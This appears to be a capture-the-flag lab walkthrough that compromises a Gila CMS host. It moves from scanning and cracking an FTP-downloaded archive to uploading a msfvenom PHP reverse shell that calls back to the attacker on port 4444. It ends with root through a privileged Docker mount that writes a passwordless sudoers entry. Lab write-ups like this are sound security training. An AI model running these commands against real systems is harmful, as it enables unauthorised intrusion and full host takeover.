We start scanning the host : nmap –A –T4 –p- 192.168.1.3 –vv
Running dirb
There is an ftp service on port 65530 which allows login using anonymous username
The file we’ve downloaded is password protected
We need to download a python script called 7z2john.py to extracts the hash from the file and open it with John
python 7z2john.py arjun.7z > hash.txt
The password is family, let’s open the file.
The file contains a hash looks like a 64code we can crack it using base64
gila:admin@gmail.com:princesa
gila is a directory name 192.168.1.3/gila
Running dirb gave us http://192.168.1.3/gila/admin/ now we login with the email admin@gmail.com and the password princesa.
After we login there is a File Manager where we can upload a php shell, upload it to the tmp folder
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f raw -o shell.php
Now visit the link using http://192.168.1.3/gila/tmp/shell.php also make sure to start Metasploit and start a session, or just open a listening port using nc –lvp 4444
Reading the group file we can see that we in a Docker group, we can escalate from there.
Just write the following commands :
docker run –privileged –interactive –tty –volume /:/host bash
echo “www-data ALL=(ALL) NOPASSWD: ALL” > /host/etc/sudoers.d/foo
Now just read the final.txt
Hacking Tips & Tricks - Labs Walkthrough - Infosec Articles 